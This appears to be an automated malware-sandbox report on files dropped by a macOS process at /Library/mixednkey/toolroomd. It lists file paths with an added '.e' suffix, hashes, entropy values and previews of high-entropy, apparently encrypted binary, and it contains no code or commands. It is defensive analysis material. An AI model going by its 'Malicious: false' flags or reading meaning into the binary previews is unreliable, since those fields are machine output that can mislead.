SHA-256:	A0BD3013722AB70569D7070AE004478AFE77876DFEA9AFA1489C118AAB75F53B
SHA-512:	F4AAB43617FF53ACC5EFC3120B1EBA98E123BBFD024AB9BA0D84001DAD5AFF550F4BB6EF801B344D5BF9892BC4E7299D2330BE729042B1AC479CBC72A7E5210B
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A......p.I].,w.Cf..^....uJ.L....jj..a2x.Hux.3.7n.....CuD..k4R7...i.........J....J....c.(..u..u(.w[V3U`....KT...[.^.zp$.F."9.Cb.^..YE.i.Q...}X...L...$.7x2...0.$J.g..t...G.A......U4.Nin..RN5C..e.....Mak^l..a.....]e.\.B...G.D....q.E.v..W...Y.....<g=%..:.&.._..5...i.y=..w.....Z.....SeJ..P.L..........uOZP....6a..j@.j..gY{.......sv#.R....2..d.RF._..K.kn.....M.%.......M........Eh.S........:...ZH.D.K...r[._o....r{...~P.:.n.s..._n...j.[2.@..G..?...:9...)..L.P......4..w.....L;....(....;....o./'_.V...Z...P....=..kR.....?......p?./..Lq.#....\.>S.m...\..09[.......4.....IK.S..w.d.$6!..N.P.m..d.."/..xsuX.(..\|.....[.G..Y.W..DG...0.zJ..n7....z.'..2s..x..~...[....k...I.?......^.Km.6.Y..S....8.s..k4tjJ.X_..h...a.8U}>\|.]......D.g(...R.0.zr..G,..Q+.Z...[.P..W..B.2.U..eD..tg..\.AV..z:..d.#.:..OH..Z[....A.{....D..XD)M7?Z.J4.m.P...........M..U

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.QuickTimePlayerX.help10.4.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	9474
Entropy (8bit):	7.957427306861665
Encrypted:	false
SSDEEP:	192:La6i8crc6CMeqEjExik/b5c4cXtwY97fOKrvGZ+0Zsb2aRB8QO6u:WKcrMqV/bfMSYv7v0Zs6af8Q3u
MD5:	3BA9960FF89B97E11F15984E31E805D7
SHA1:	57A0C6EA8399B9BB7053C13D2073EF18958D67E5
SHA-256:	665DBC895E2C0C78A02C7D617FD0BF77F8F184D17D9A3D14BD56842B6C64ADD7
SHA-512:	E9863254FD1DF05FC769C8DA16724F4175706F72A18AF2A773E2DC2EC3F641EE3710E6B603CC790D72057008A465375262241A4416C5CFD5AC55ECF566B39280
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.......MF49.1...$.....,..19&...8.5<k... ..N....6!.A....B.?.k.a.^."t13......Qt.....0{..2f.2..i...0.%....)&.6$..9N......v.S...q66...t...8L.W...!.....{.}..Sv2f.]..?...2....l4..2A.>..u...!.D.J........f~...jXy7.b.W.....rz...~..a1w.....g6<.."a..:h.[G/.;)>`^..N....i.=.6<.."a..6<.."a....DHq....d.....L..[P.N.zH]E._Bn../.P..:p..F2.EB...HB?....SGeu6<.."a..X..V........7.@..~ .],...H.........A.Z.Gd{<.i...2.>M.V........nI.].`..se.1.r...#..iJg.K0.#.......d,a\.(n_6.Fm....>..q3..N.v.)"......f.?}T1.5k.~..f.!~.aQ;u(x.6E.&.c.d{i.G..B..x..<@v.WR%..;...z.6.....6{..Bn.?.C~......21...\....T:j..7...S1..-.....i.O........#............+.8.u.$..%...;.....M.j@.AEB.8..7M.H.mb-.u.b..k./.4\|.%x.Y..6...".\|.......O~.............RI...S......$.......EAyn.P..[...g\...x..gC.an....._.+....d..Ud.5..G..Q\|DR....Ja+....5...u^3....:B.Cy..T....1.....sN.".s......&.T....e..~...X.Z..q..Xc.

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Safari.help11.0.2.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	40004
Entropy (8bit):	7.992503334886976
Encrypted:	true
SSDEEP:	768:o2yDX6wJzrzfwPb6/aQBsmGTMEDsqAC66mGaaNB0jREK28K+t:NyDXrJzrzfwPI/BsL5DsqAP6vayB0jRh
MD5:	4409AC2112244C656419F478695CE81C
SHA1:	60CE2B35EB01B83AE7CFA1DBF616F928EB469440
SHA-256:	9C424BA897084E0A362A6278A864A73061D7DAE0311C1CDFBDF7C63F2C32B1BB
SHA-512:	62AF23823E21406A025F3C5E2C8C6BFC6D3EA89915582607DE1EBA86CF2FBD46E230D80E2FB828B02279AC6EC327975EA45BD419BD1EDBD07CE9C2ACEE8539DF
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A...........P6.....d.Js3.U.k....M..cS..K..W...........q.A"&...q.A"&...q.A"&.A..<..J.^=v..+..2w.)..<;l.k.,N......M..-'{,.).A~}VY.X1..Y../P..a......5....[T......7+...B ...9J....o;......L~=e..H....v....=.....x.F"2. ..y..?..zi..KN...S..s......q.o...+.7...vJ.Ki...BXn..b....O.\...G.C.c...sb8...w{[3..F{..:..'on.V[.8.....Mi.\.yls.......E\..b........7.K...-.{v._P..lB%..#..N.0.j..QEA...n.........YA?..H......R..7`......L.b...Fc.u...#@...y.'...91-.o.D.4.......=N..n..{.9.9.r.....d..$..B.....&^.....]\Z..)....v......j........"?..[.-...h..t..e.-.x:...=j.(x'.M.b"i.h.2...Z.u.ze.-K...l.`...p.5.%.......Ll..v......&..Z...~R...;.R6<.."a....Q....F..mpQM..........1N.Y...3.......W~.....K.E..y5R..x.?g...n..'..6....u55.L.\|M0..@.{8{-;xT...;1.F...g.\....Fo..%I.5}EQ..v.^bxK..S../...UW.T.Wx.E.]..qz#.1-.c#....US%^:.....^..w.s..DjnC...;.K3.3...r..N.........?&_.vq.o..

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.ScriptEditor.help2.10.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	9642
Entropy (8bit):	7.954369385611558
Encrypted:	false
SSDEEP:	192:LrY1MKUMXUxl+lCN4m1mzY6RUt/36JQNfK7EWzXoLxKpgOvTLD2tVhHv24HnCir0:3NKL4N4m1mzY8UtsQNfowUp7ghHvVHnQ
MD5:	4E84F70709BFF0DA466FD409E3DEDF2C
SHA1:	049CE09960BFA020574FA2FBCB135EB4F4A16D06
SHA-256:	32AB64B6CA2CAE897E7B8C3B69387F033D03A995CFD38029CB99501F90C060E7
SHA-512:	F5BD6242D764277BA4CC7DC92B3C8B7F442C9E8744C5B61A8390C28EFDDC5A28560518CB7BD0660952235DC94A8D3474104BDC7C693356F7C0D629404EAD76D0
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A..........'...F...K.z..,..19&...8.../....A.8...\|H ahT...'...fR.XvH..8P$.!....Y..\0......Buq}.J.<..5....:....4..U.)....T.........O85oI_....W.._R.W224k.........QVi...i.l..n.Y}....m/g..4.......6..$.[.!.J..4=..8...........0 ..#.0..._A.g..(..:9.Z>6<.."a...h..v...^..T.hc........?.M.......i...UQ]...$Y...<.t./.].z... ...g.;...F.<.vUFN.r..8a)..:m`[.G.......J.Z...S.{]...]>..\.}..<W@.....=z)...br.).......tp./...w/.Ig./...#.3M..M..Lu.8[.9...}.f.N....F$.u....^.O..J.F`.:...]l.....^..[..r.A<...\V...\....?h........_Mo..k......f........d.=...(....L4.j.?...?.,.......K......s...5.....%J...%...Mc.\|....g">.. .f.Z=.h_.A.Sn...p..p\.....R.o.iT7.).....1.m`..jSU;......oH.e ..w.~7.S.........]c....A.c..!.......n=.......p..?....Y&..._hL.S)C...X..N.JO..6]9.`.z....v'.z(...C...3..[..*.0m)...x.+.ol.aYw.V.u/1..)......m.....5..$?..D...K...%iXYA.BX..A.Sm.......

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Terminal.help2.8.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	24515
Entropy (8bit):	7.989041647852515
Encrypted:	false
SSDEEP:	384:IkS9AT9J8yjwUbtDDorbQEisuc0jIWq6zjmFx+5xDDapArsUKl8Dne6TAKY54CX5:fD+UhwrbQsu5EWq6OFxVePA8je6TAKB+
MD5:	AC245B1D2D94FC473E1B4D51A3E7E666
SHA1:	D602210657E1BAD8CE5A0043C9E892C7804848E7
SHA-256:	AB79D533C33B4F47708CA6B58E8B7C489F15EBAA36762D148AFC4210839FDC09
SHA-512:	77F92B833E57EDC4FC54D20A9D60FF0CD0EE1C33F8F1BBD017FA4F1B466C56D116493F45BCCB749410CB788C9D9908E41EF73AD850366634723154F899216F97
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A......0..T..o.R."xn_....uJ.L....jj...4+..X......G.....q.A"&..vg...U.[...uz...K......t........A.:{5....gv#..Y...1...\....6......X`..P.T...~..Q......k-r..`.m....V.....j...........~...'...J.r_r&(..E..$..'..Q(..XJY.7.....o..t.L.\...c/....w..).~.G.Q...s>.......T....lc.@.zr....L.2.>....d.z........3...4w...}....p..a...S...t....r<...`.0...r..#w..,.n..g#.......g.3......G^I.<=..T..3.#.......t....\|[.,.&C..P..g_..9Y?..F..].W7.6.w'..e..3....<...&u............]...F....o......Z\|mcg..=...V...\|........KJ.L....;\|.4....S..A.......A..&.......2..".M.v(.\|c.(%se.~...v.L....Gjj..n...n..J..`.KU.m\....[/..z..Av~8.....[...Dr0.Io.S..u..I'.AeVd....9.p\|.a..{?.A.^..Hb.jw@*.c=.w...... .Np.6g....)."...K...b.g.Az.R.$b:.......>....~{.......C..6.4.....~...H..!..}.....QR..F....y......$....J...L..g:.....Y.................\...l0.`m........s.f..f...s...Q..O...e^..vw..G

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.TextEdit.help1.13.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	12378
Entropy (8bit):	7.971287857378837
Encrypted:	false
SSDEEP:	192:LboMIxYvlbRJAqG4O6hvGF2FjqAIlX5wzKimBVUEHULzZjbk3tF/SDmyytvGrNiw:AclbREr6B2x5SK1VH4zZfODy0vGBO3a3
MD5:	45507E86C64D5A0143D6BD60A9019B6F
SHA1:	E6EE6669320855F70B72C809822AEC1616CE6CD5
SHA-256:	F41C5EB06691C60B15A05F7F1242B0B0B47F4CB40F7841992D082DD6C2680535
SHA-512:	C829CC3B72E8A0ED1DDF76ECE151674E2CE66178959273F2C9EB4C3AB96109993A14EE21DB87ECE0F950C0869DF7C0CF34B09F13FA1F59ACC4B9E348B1006941
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.....u....xo.a/.I\|..uJ.L....jj..v]nq..s..._.....&F@..c~c=....E... ....h}..q#dI....%..-..9..V.r....`_Q.B.....6.).-....K.?$^.i-...\|.yCL.I...n<....O..IV^.K.,"I........y.O........>........P...8$"..f..w./..'....A..Qd.O.."...A/(...G...=...&....$..(6.J.t..` zN rX.T..tG}!}.)n....%.f.z..r_.'..0..)L.MQj.8.T..6.n..-...9Lax..J...Tp...b.y..`..w..&...es.(..(.......Q..............D.dU,..".....!8....>..h}CD...9....r:.Hn\:8R.....`.}(c..<.E.....l.....]8g.....).n.E5..,...<k^..\?.~ ...m.z)$.dj.@.q"WG..d.W...u....N.#{7..t...`..,H.....`...a.:.._.$'.v-.E.M$m....^0..... ..r..Q...j\|.....p.H._..4z..._0].,DJ....D..m...u../.......!.......h:W..c.v7.H`~..s...@..p92....J..b..Z...D.]........lV...V...d.lM.8 C....bi.U.._..].M..o.F..{....n.$g..b.AS....%+.hi...k..j-.>o..].(7.....X,%hE....b\|..b{...g..r.).O4`..<.W-....!....Bd.%..2sf..H..g\|...p.!&.2u.].Vs..

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.airport.airportutility.help6.3.8.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	16058
Entropy (8bit):	7.9766452906331216
Encrypted:	false
SSDEEP:	384:htKdT+od4VGhpnJsgoWHsgcnM/z2N+hgDi1ltM4F9:XuFdfvnpoWHdXb2N+hp1ltt
MD5:	ECB3E34A55EF0FB5DA185648B3C1BEB0
SHA1:	1A9822A08FE82F068351AFD74EB7506313D52519
SHA-256:	6325F9AD2637274A31A7514B469C1092A7946A1B11AFA02A70974D9C210826B5
SHA-512:	56078EF89A2EF02A6C04E9CBEABE3146F988A282A8530A83FDEAE977B50D50249C3F5E77D4F219631DAF733B0A959754893C66B0A3DDB3DEB76340C38CB9FA22
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A......WYu.vt..:...x^...uJ.L....jj....8.2....^....V@.x...[.4^..{..#D\|..8x.?It....i....Gq.u......9k2.....k.{.%...AiNij....v]K>2..=.Z....bB....^.r..X..<...=..k.(..T..h.W.T.YN..W.T...\|R......x.Zk.e.L.P......h.Q..\|........O8..L"......`..q?.IaJP...q1N..H....?..<..A......V.>..._.#...3.>..4b.7~P..z..P..8.....!..-xV...."..Q.W...e..>........$.HY`.M:.ZD.).B..y..j#..}K..:p.2.7...e.I.t.r.<>..a;..T......8.F...$!li~....>..<.L..n..x....Ks...Ov..NR......V./.fe`..k....8G.S.E...dq.._...1.q.ZpL.U.Vk...Z.?J..%.......c..[..G.%....d.7z.......;O.....".......$.q(G....VA5.1E....QPKE..K$.f......C!.......R.c......,...../.C(G\|..fp.9..}oa......`.[.#.D..4....u.J..*......@..`.W...?......o..7"R.%....`.{W+.....g'....A..)O..?....E.<......3."...6i.w...0...y..........i..NQ........(;xzZf.s.~..3U......;3.,4...=.E..\|...8.I0..P..._....;:~...;...?m..@9r..5

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.iCal.help10.0.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	21483
Entropy (8bit):	7.983903269416882
Encrypted:	false
SSDEEP:	384:H5KYeXheZO3esn+IYPZDazSARWs0UKIevfIn4D0EJfdKQsrY9Acft8:Qjp+sS0WZgnGJfVsruft8
MD5:	C7B49F040996CFA9BFC39FE9C603234D
SHA1:	250F8A2EB462E907BD30203AB963F565D6B957D1
SHA-256:	9F59282D7DE1293D649F7B1C0E37F2AEE504AC633D3424253364E4E56FD63243
SHA-512:	EB19D9E66A9A0A4C53767AF1FEE6B87C2E398D7ED4E0A45D207B41DD9B1A19E043A152738104BDED4042521D24BB19D2A4B6605991F24CE01CD06BD1179024BC
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.....O$..2.$.4RoN.c...uJ.L....jj...,..n-W0#..Z...E..[...m..E.'...F.....HB.25..C/.d.2.../..=S6 aa%.+.x...._..S....=...cN..)tg..+O)5)r.T.......<z...y^0......1.)?r...sU...R........3..S.0.Gi.....SU.....)....F0..........?4.. ....vW.J........I..:..!({....K.2t.....P.....k.[.M.N..w...Y.nt~.\/....%F.8.LG....o..:U...6..y(#x.F.;.bVQW......~,D...........xp...g..:b......8F.....[.U..n..........!..1fU....#.c.`..T$....8.G,...4_\|.i.t.2...3.....p.9.Q@9.:....Cr.Vft....Sq..r{...#....d......Xo9.].j...D....)CR.....\.../.'.`s.....C..b.5]..%4\| .......cI.....1.4.t..v.....A<...y......K.x(.$..9....T.......@.c....Q.4.[.R.`.xE."B^....".....F...+..Pm].....`........K...E[OB......-.$a........4.3....9.,..^e.0.t..02@a}I.G.R.E...n..dM.`.3.)9;.[..Y/..........8..:......N.Sv...S.7`...(....h...P.0V.AL.5h..i..x......%.b..s....T.ys.W.Y....)8...H.\|.......K-....9..Ft..s.

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.iChat.help11.0.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	17091
Entropy (8bit):	7.979229605356056
Encrypted:	false
SSDEEP:	384:HgNYXe4mLH7rrvP6heqyUJ30DAoOpUkMUXnZ:Xg77OPJ0/OpUA
MD5:	50CC6CBC277FADE76EE9E94DAD7E607F
SHA1:	4901592108E8879A431FCB33B390496D93193600
SHA-256:	33249032F68FAEBC9ABAA7B3F53738519FBD97F0BD28F0219DFC7DD382F651B1
SHA-512:	1BE79B75BB325E3712A3FD8B0CC14C36074FAF635951E87E37F9500220D0159F0E7013BAD4EBF74B564FEEC9E6E10778AD72C1CFA78F419C446BD8D498794884
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A......Y\.$~$..H...2.....uJ.L....jj...pi...p/4X./"IpQ......,B.4r..G.7.w...5.V.R..`>O-.A.Eb.....m.I>..:iiw.W...L.1cN..V}........l..y.I.d.......n.....)....Z...-BO...... ..V..J.@.....^..s.tN.Q\|..EE.d'._7.yt...3&V..?x..as..X.8...... .lg...h.Udr..!..m.E?...wQ.a.l.YX>.j.l.$B9.<....:...v...0;....o.I...b.?&..V=..........1."....f.G$...h..8..O........L...v^.;...r.}..,.,......lw.5wd..^GJC.m/..+R...._P..8!..j.[.7.U.r......Iw.;.,..o.`.hL...zO[..]?.M6..FX.A..l...7Y:........1.maFWd.}&.1.;H..o=.?$K..r%w.G^r.`.,8p..'u...[2..e8..6. ...W.d.U..".>...X[..\|.Lq....F...?.!...%.c5....#P...k9..)..../.V....<..<........hg...Yh.....RH.mg......@.<3..oY..Cp....6...1O.y.4...K?R..nA.B...(..3.eY......f..ez.=.....H.U.Z..8t.s._..A..2I..@q......meI~*..o$....o.M.wJ]..u..O....r. R.`.DQ...rhU....F\|..>.3..9xt..H..MB..nh........%.."......i........E??d?.?.s&........7....;%B..../s.

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.iTunes.help12.8.2.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	55205
Entropy (8bit):	7.995304716476017
Encrypted:	true
SSDEEP:	1536:wlf4NelKaBENZhU5iNjUP2SMmVdOaXYn2iElk:wGelHBENvUENj9St/4nUO
MD5:	13EE6DD8FB43E2DBEC21EABFF5F575AA
SHA1:	78CC27D910A4DB485CB7A1EED7A7CF8CD2A5AB3A
SHA-256:	06A0CE0F9F786331B7BEAC266BB274FC824EC727AA02C028BA4B51399C6DE75E
SHA-512:	343739C25F0726D5F9556C43C3F145F5E32B4F4D7EA0AE6658B8DEC676F8367A18250BF5F1D464593BBA52BC4B4EF36423209A60A88AAEA8F2983C980A2F4CD8
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A........Y......im..sp.a.^R....M..cS ....1...=..H.....q.A"&...q.A"&?3...?..y..[?..X..Gy!u...Z>..+.0(........\.n....U...y..x..d.K.....9...fu.3u...'..n....+...:x.d.w..U<.......e.....,....t..4...6........`q.../".x...U.Ad.#....nc^.tW.....d..8.'..+v:.."Sd.3.6.\..^....?k..~..i...C...Sq.y.A...^m.6.9...............U.....,.43.h......:.0w..6....@7. ......{.z.M....sNd=zG/!.j.]K,C....,>...$.O1....^..Y...]...f.L u(.q..'......Wz.......i6.aZE8]G..D.T..kn.w.N..\|F..J.m...iIE.ju.G......U4~..r...f....X.`d........dw..f.q...'..bT./v..X...z@i...;...#.. Q/;Q..!.h.dTaa.9.y..8.4 .k....}.[...D..PH..\..l...W...^...l..le......H.6<.."a..6<.."a...PjA........LA......B..6.......`6'...k.%}L..(.2.f...Z2.@Df..l.u....`.\|,. ..~...0.16..,.a!.......!.1...T.^...~vu6<.."a..)H\.x......C.w......Js6a\|....]........KnP.Y..h..sNA.Q...M.1\|N,.f2..V..&.w...+..@.RoB..TC.r....+.....

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.machelp10.13.2.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	289651
Entropy (8bit):	7.9993723664400616
Encrypted:	true
SSDEEP:	6144:VFqs6kTlYEH2yWKTVjReYhXoZjTgrYNFPc1M9oAIsj+q+:ykT7HXNVuZ3NtloAIF
MD5:	E7D4544EA48FE435E43CE0A87776BDFC
SHA1:	664009609DFFD5E0EE9EE7A0796D1AB2E7BB7CE1
SHA-256:	780145C5E89E6CD05386E6EB1349E725357BFA323E8EFC70C4661F52764D4F07
SHA-512:	70B32C8F38EAA5F6CD2693B5A2F20B296C3F8CB6A6FB124E43819A0640B41D8E63EAD1195EAF94DE1867EB1C06C175B35DE43BD6C5C48C555C8ECD7D3D16D916
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.........J.[.]#r.v...6?c....v[..#.@.;.K..I.K?.......q.A"&...q.A"&...q.A"&jV.G..C.g.,....h.a..I.....ap.i@w........y..{...jM6.....E.d..m..6<.."a..J.1........I..! ld.."k.#.....m..p..b.../....:&.Kpv..)..o.g..6.,..[...<..x ..x.Xy..{./.@...\......@.om...X@.PZ9....o.F94..\|.<:..... O..iw.../....fC.....d..>.).f.M...Sc...D-..X...k.(.c...=......L...%U..us`.(...m.4r.....sg..M2.A.I...#\|2.5.O.....%.d...c..>.'M.1.=.)@8mG.W....D....d2."..Q.4.Lz...DY.TU...t&7.d.}...sR.../['/9..d\|.{u.C..N.....L.b..d.ZX....\Cm.h...x.oLQ.W.w.$P"..#...e...Y.+.%>..'.......c..0...'...9j.8&_..E<...H.}.A@T..3....;a.Qk,.C..?]....d....J...jd... $I.......<........z..o.p.&.<(.......Ev...O....,.J..E.(..C.U.......Ya......dx........(%@..Q.@.K.......K.mE.<.........=L.8w.2[~...g.m{..n._cm@.W..-.Xu...wMYrz.....&T...I..-...*.z.{rD.9...C.G...,..2-.[s....0yyl[1..,..E9..z....o.#P...!".

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.reminders.help5.0.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	8034
Entropy (8bit):	7.948308328183279
Encrypted:	false
SSDEEP:	96:LyoJoZT9HAJawIbCB4YH+obA+V9k0qW+Vfu/BCtdBq7RuIMyCRiey9DLU+VUd/sw:LQHDFCJH+f+V+bWsG/ABSsin8+V0/UE
MD5:	1C39B92158E4179E0152BE3BD7165332
SHA1:	AB246C0AB24077A4074D672948CE5DBE2DB3CF81
SHA-256:	A66841D99B37392EBB61C2E1F27E8C8985005C38C25E17801B7888C9A39E8E45
SHA-512:	F42868C8B8A0E2E8E352A09BF56BC1CBBD4E6536CA9D455A9DF8933748AD8C13FF2FE2DB4DFA0744CC7902289FD2A58CFC2652AEB35546FF58EFA23877348550
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.....(....0....z..%...,..19&...8."l.&j......+..j..7.0Sp&.......x..f..[r>~.5.R......\....@0..L.m.+....\...<...Y..5a6.Z.t..Z5...;d.5.X..fe.U=....R.y....{....]@.._.......D98.....(.."...dU..$x.....6>O...E..C....y..F.dz..n.^..0....+[.N.}.:{..W.. k(.....PE.+..b..MY.6/~.y].b..F.{..J;....@.."z..7.=.Foe.,cA.G.Z....,."..S..(A.z..Q.m.5..>../n.T.^J...z....fS)...B,...`....H..!/H.f.w...}.U.".}.}..b......_.O....]...t8iW.....h}.$...Wo.P..l...J\.....6.1{IO../.^&w.j..8?x..Sk...n.....?CR...>F..".....>.....9#.1&.\|Y...(Y..o.......A.....9FF......(f..Z.....g....r...D@?..5........;5j.....N..>..I.v.N...H...e.s9.#......n.....ug..y..Gtd...y.\|7.\|.f.2.#..5..8k..."....qR.#.........@..........<;I..W.......9.%.&.........l.#..A.;...XwSc..A$,r..k.]..bk..T.I..Dg...1..%V.6.......q..0..j.j.9.E4.gB.1.......#..4fu.. .jy.e...R.P..=.7.5?.{..p.9..$yk......<...b2....6...

/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/.fileAttributes-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	4.398173625884462
Encrypted:	false
SSDEEP:	48:MsAhRMpJTB888888888888888888888888888oafIJhNgo9I3KARJ6B3/wBqMcQi:wR4TRhNgo939wBpnrVdfeOGzEfX53u
MD5:	075E092B9E704941675B629B7AD236A6
SHA1:	F0EDB5078F3DCA8CDE520C470E0AFAE433A15262
SHA-256:	993865EEAF58D631CDC888BF7A05B00E34A94FF8C3F4E139F69001BBE960B895
SHA-512:	56366DCD88DEE162104041E8AF0D4DD53167F0A5EED0FBE498CFB1F627BAD423FA1C6DA147E3877EB5A56357F5E77863B5EB1F723A0D1FA8FF1512E41B59FF42
Malicious:	false
Preview:	f...#D.......3_I..-$..b..O..~I.\hZ`S!..o..#.f...#D.......3_I..-$..be.....\|.~I.\hZ`S!..o..#.6<.."a...t..&.....q.A"&6<.."a.....rW.......l.;...7.z?..`........S..M...`........S..M...`........7.z?..`.....^UN ...:11..J.5v^UN ...:.<..Yv.m..`.........V....`.....m.....$..>..K....g.......g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U...%....g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U..g<&V.U^UN ...:.In....Vu.....8Lu.....8Lu.....8L...?.s.u.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8Lu.....8L^UN ...:.3.?..x.......@$*.z..,.\|......@$......@$......@$......@$......@$......@$......@$......@$......@$......@$......@$......@$......@$......@$......@$......@$......@$......@$......@$

/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/.fileAttributes.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	28995
Entropy (8bit):	3.5501255371439946
Encrypted:	false
SSDEEP:	24:ndmcgqOI40000000000000000000000000N00000000000000000000000000009:n5iIN6MBeRitvRBtZc7OfOOiNpq
MD5:	33F5CDCD57F4D9C886C5D34B1B1E1256
SHA1:	A3E543E8DE2278EA32E62743ECE3C953D78EEB27
SHA-256:	EF97700EF1DDFD5EAADA02E5F9925C804AE667F18366A88A84399C4B89C0D62F
SHA-512:	748EA1841F699D259BBEC936DDF1937E268A7418224BFF27990E496E82AE0F3C56FC1B23A39F955608B4BBCEE15CF55966806EEA197673E8294A0CD1BADD932E
Malicious:	false
Preview:	..d.=..._t.........X.....9....6<.."a....i%0..p.EGyU'&..7...x..7...xt....Sq6<.."a..VTZ..'.^.#$:.N?U`..o.m........6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/.suggestions.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	132938
Entropy (8bit):	7.997114966279252
Encrypted:	true
